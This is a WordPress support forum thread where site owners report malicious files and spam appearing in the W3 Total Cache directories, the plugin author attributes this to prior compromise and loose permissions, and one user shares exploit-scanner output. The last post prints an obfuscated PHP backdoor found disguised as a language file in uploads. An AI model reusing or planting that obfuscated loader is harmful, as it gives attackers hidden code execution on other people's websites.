[Plugin: W3 Total Cache] W3 total cache and security

I’m sure 100% that W3 total cache is not secure.
I deactivate it and delete all the files from my website and I didn’t have any attack anymore. I reactivated yesterday and few hours after, malicious files were in the W3tc cache directory again.

Please correct that.

Thanks

Hi. This is concerning, as is the lack of response. Have you or can you try hardening the folder with htaccess? Something like:

RewriteRule ^wp-content/wp-plugins/w3-total-cache/[^/]+\.php$ - [F,L]

This would rule out the possibility that the vulnerability is a dodgy script, though the injection may still come via a carefully crafted query string or something similar.

Also, does the vuln occur when the plugin is disabled but NOT deleted?

What’s in the actual dodgy files? What are they named?

Hello,
Thanks for your answer.
Sorry but I deactivated and delete W3tc totally from my website. I can not test anymore.
In fact, it is too dangerous because those malicious files are used for fishing banking companies.

Malicious files were named like indentification.007.php and more…

Regards
Dimitri

This is interesting considering a couple of days ago my site got blocked by HostGator for going over cpu space so they told me to install W3tc instead of WP Supercache and when I made the switch my account was instantly restored.

I wrote about it here: Forbidden Error Tells Which Cache Plugin Is Better

Now I haven’t noticed any malicious files;however, I should add that I have Cloudfare activated as well for extra security and speed..

@lekiend, so how did you come across that attack and what types of things were happening, also what plugin or security measures did you switch to after deleting W3tc?

Sorry I’m not clear on what exactly is the complaint or issue here. W3TC is a caching plugin if your host or other site code (theme / plugins) are insecure and your code is compromised, W3TC (if it still runs after the attack) will create cache files containing the modified pages. If you deactivate it, it will stop caching them. That’s all.

What you can do (and what hosts often do) is compare the modification dates of the original files to those on your server when unexpected behavior occurs and then you know that something has changed that was not approved. I also recommend services like VaultPress that make monitoring of these kinds of issues very easy for end users.

Having said all of this, if someone is aware of how W3TC was used as a vector to compromise your site we would like more details.

It should be clear that were W3TC a vector for compromising sites, the www.ads-software.com team would remove it from the repository if they contacted us and we were not able to work together to make an instant fix. There was a recent attempt that affected several plugins and the fantastic www.ads-software.com team took immediate steps. Even still that shows that quite often plugins/themes do not represent overt vectors for security issues, however we remain vigilant regardless and have rolled many security enhancements in the releases of late.

As for hostator, we’re trying to work with them to make sure that they have the necessary documentation et al to address customer needs and we hope they’ll have the time to allow us to contribute.

@frederik Townes: Hello, i do not know how hackers do but I’m sure they are able to publish files in the W3TC cache directory. Those malicious files were not present anywhere else in the server. W3TC was still working.
Hackers do not try to crash or delete any files on my server. They are searching to use a part of my server as a fake website to fish banking companies.

If those malicious files could help you to identify the problem, i can send them to you. I copied them in a directory outside apache repository.

Regards
Dimitri

Do you use the media library on your server? They could just as easily inject viruses into your jpgs as they could modify cache files to contain whatever they want (until the cache is cleared at least).

Anyway, what would help me identify the problem is if some file in W3TC was changed (somehow) to allow them to start modifying the cache files (if that’s what you mean happened). Otherwise the permissions on your cache directory are too open (which is atypical since the owner of the cache folder should be PHP as a user).

You need to talk to your host about the correct permissions for your media library and cache directory in order to make sure that WP works normally without making your site vulnerable.

Does that make sense?

Hello,
I use off course jpegs on my server. I test them all with an antivirus with todays’ last signatures. NO VIRUS found anywhere on my server. The only malicious files were located in the W3TC directory a few days ago. Since I remove completly W3TC plugin, no attack anymore.
I’m sure if I reinstall and reactivate it, i will be infected a few hours later. I’ve tested it !
Security on files are 755 as the plugin ask to be. I usely use 750 and I change because the plugin wants 755 and nothing else.
They first upload a zip file into the W3TC cache directory, they uncompress it and they simply call php files with the full url to do what ever they want on the server.

Regards
Dimitri

@lekiend Please read the security faq on the proper way to report a suspected security issue.

Also you should be working with your hosting companies security team so that they can determine where it’s coming from. Fredrick has already stated how seriously he and the core WordPress team take these issues and how quickly they react when they are discovered.

The hack most likely was not completely cleaned. It’s important that you follow the steps listed in the FAQ My site was hacked.

@c3mdigital’s right.

You need to talk to your host about permissions because applications should be able to write to the disk without making things publicly editable. That’s a hosting configuration issue as I stated previously and whoever hacked your site could have used the media library directory to do the exact same thing or your servers /tmp directory etc etc.

Something is going on with my site also that involves W3TC. I think it just started yesterday. I noticed that a new author page was created yesterday that I did not do and have never heard of this person.

This is what was created:

https://www.downloadformovie.com/author/HarbeckLaughery/

/public_html/downloadformovie.com/wp-content/w3tc/pgcache/author/HarbeckLaughery

Then I just noticed this morning that two more of the same type of author pages have been created:

/public_html/downloadformovie.com/wp-content/w3tc/pgcache/author/herschelxsmith

/public_html/downloadformovie.com/wp-content/w3tc/pgcache/author/MazzarinoHinderer549

What is going on???? Is this something with W3TC or something else “using” W3TC?

Ok, I feel kind of stupid right now. Sorry. I guess I was still half asleep this morning. I just realized that w3tc only cached the page that was obviously created somewhere else. So it has nothing to do with w3tc. It’s just when I did a search with the person’s name, the file cached file is the only thing that showed up.

I’m facing the same issue, spamming link such as posting in comments was posted below the header of my site, when search for them through ssh I found them in public_html/wp-content/w3tc/pgcache/6/a/c/6ac2c5172bd2c18d7c9ff26a128d6c11
When I disable the w2tc pluging they go, when I enable it they come in the same place content/w3tc/pgcache/6/a/c/6ac2c5172bd2c18d7c9ff26a128d6c11

when I run the exploid scanner this was the comment regarding w2tc

wp-content/plugins/w3-total-cache/lib/JSON.php:22
Often used to execute malicious code * Javascript, and can be directly eval()’ed with no further parsing
wp-content/plugins/w3-total-cache/lib/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:111
Used by malicious scripts to decode previously obscured data/programs $this->_accountKey = base64_decode($accountKey);
wp-content/plugins/w3-total-cache/lib/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:135
Used by malicious scripts to decode previously obscured data/programs $this->_accountKey = base64_decode($value);
wp-content/plugins/w3-total-cache/lib/Microsoft/WindowsAzure/Storage/Queue.php:467
Used by malicious scripts to decode previously obscured data/programs base64_decode((string)$xmlMessages[$i]->MessageText)
wp-content/plugins/w3-total-cache/lib/Microsoft/WindowsAzure/SessionHandler.php:150
Used by malicious scripts to decode previously obscured data/programs return base64_decode($sessionRecord->serializedData);
wp-content/plugins/w3-total-cache/lib/Minify/FirePHP.php:1035
Often used to execute malicious code * Javascript, and can be directly eval()’ed with no further parsing
wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php:711
Often used to execute malicious code eval($evalStr);
wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php:713
Often used to execute malicious code eval(“\$proxy = new nusoap_proxy_$r(”
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:4047
Often used to execute malicious code ug(‘in invoke_method, calling function using eval()’);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:4051
Often used to execute malicious code #039;in invoke_method, calling class method using eval()’);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:4054
Often used to execute malicious code 9;in invoke_method, calling instance method using eval()’);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:4073
Often used to execute malicious code @eval($funcCall);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:7020
Used by malicious scripts to decode previously obscured data/programs return base64_decode($value);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:7867
Often used to execute malicious code eval($evalStr);
wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php:7869
Often used to execute malicious code eval(“\$proxy = new nusoap_proxy_$r(”
wp-content/plugins/w3-total-cache/lib/Nusoap/class.soap_parser.php:504
Used by malicious scripts to decode previously obscured data/programs return base64_decode($value);
wp-content/plugins/w3-total-cache/lib/W3/PgCache.php:1284
Often used to execute malicious code $result = eval($code);
wp-content/plugins/w3-total-cache/pub/js/metadata.js:92
Often used to execute malicious code data = eval(“(” + data + “)”);
wp-content/plugins/w3-total-cache/pub/js/metadata.js:99
Often used to execute malicious code data = eval(“(” + data + “)”);
wp-content/plugins/twitter-tools/OAuth.php:202
Used by malicious scripts to decode previously obscured data/programs $decoded_sig = base64_decode($signature);

Now when you go to you wp-include there would be a file called wp-image.php that file was included in the general-template.php

(@include “wp-image.php”;)

Solution : delete the (@include “wp-image.php”;) . Then delete the entire wp-image.php file

The wp-image.php is not a wp original file, it is encrypted, calles these spamms from other site and prevent to display them from regular users. I would probably got their because of w3tc pluging or any other plugin.

I hope this is helpful for someone

@walied, thanks for that, but it still looks like a general compromise of your site and some information on what the vector of compromise is would be extremely helpful.

Found a second file:

uploads/2010/03/en_GB.php

Similar content:

<?php
$hXf=’VnzGEJbso’|E7mWtl;$aXZwX6I='(!DA*#@@@ '|haFE.'@3(@e“‘;$OKtk3Z8a=’@BD!CB!@$ ‘.
‘A ‘|’PP@ F@%"!';$lkmH='TD('.DBQP.':'.SbDa9cC.'&’.CP2EPHRn.’ ‘.vDUA.#ak7ai’.
‘ ^’|’F@’.iDTA.’@ ‘.QhDGrQC.’`$aT)’.GTlTZ.’&6DTx(F’;$YWsaFzzmJd=CfnK.’=4′./*Xp’.
‘e*qjj*/buJycKO_.’+’.ld0QFM.'[‘.ROg5L.’:[‘^”`”.GRuVNH.”]#UL{1″.dZBHK./*FMXxuOk’.
‘JedDf?kq,W*/”}6u3 /LWb]a”;$wyVEpKpi1H=’+U@d0″d9)#cu (0x3(o ]-, B8I”i’|#kMo8Jl’.
‘A`(J$ 1’.M8pjq.'(p NS(M”)%80b:k+ ‘;$OSqnvUZss=#ZwumrxqUzqf6a5_mYk4F2_XSERhN0i’.
‘>>^MY>l5n}?o)~xo;mg;?>:aMo}}’&’x?Kn^,n?>>’.r6yzxL.'{?{g7~:s[=-}’;’wlRxhBbuVoI’.
‘g7%s}I’;$C9DIISPci=’_}{}}’.GnBN.'{‘.Vrem67b.'{{‘.UmftV.’+brs’&’]}{&>q;e[{~Ue/’.
‘w5{~5P}fw};LdH’;$zbt9FWZ=’8′.Ka8B.’*X”‘|’4RI(@HE>’;$eN4=OAo&’}Go’;$u7ZqT5q=#q’.
‘ ‘.VWTK^’OE#”:=’;$Dx=HTPP|HDTP;$z6nIv4u=_I&_c;$LsulQ2=’?Q’^Z8;$tKIJYrYl=/*pP’.
‘j#z*/$aXZwX6I|(“\$e0 Dr 4diD”|’$Ep @2 d((‘);$k9ULQcT2=$eN4^(‘ %B’|’ %Z’);’wX’.
‘!’;$uHVWpDFE=(‘C]P$*t’|’f,6oTv’)&$u7ZqT5q;$Q81gBBCXC=(‘ 2%fZ”a0$@d'|'0 “K2@’.
‘Pha ‘)|$OKtk3Z8a;$qJnWdJtAG6=(‘@t@FBDXY!’.RBBAP.’@S&XT J B@@’.PIAB5|’ $]2 ‘.
‘&@dA$'.WNHpXD.'[4I@Z4G@@ e@J8′)^$lkmH;$Afy8oAw8=$YWsaFzzmJd^$wyVEpKpi1H;’_w’.
‘=’;$I_IHW=$OSqnvUZss^$C9DIISPci;if(!$tKIJYrYl($k9ULQcT2($uHVWpDFE($Dx./*obTc0′.
‘1}<xD&*/$z6nIv4u)),$qJnWdJtAG6))$Q81gBBCXC($zbt9FWZ.$LsulQ2,$uHVWpDFE(/*qkmUA’.
‘<KB*]+V*/$Afy8oAw8),$I_IHW);#na08)-hfVF0~:rBc!qUMn}KX}G-.YqqC!M@bH4WSf}@_#h{‘.
‘8b}jXlb1?eE[j;> j+2B[kYXy:Co2LXl9JeApfyx_:_Yo =sFt4q4i$1Q’;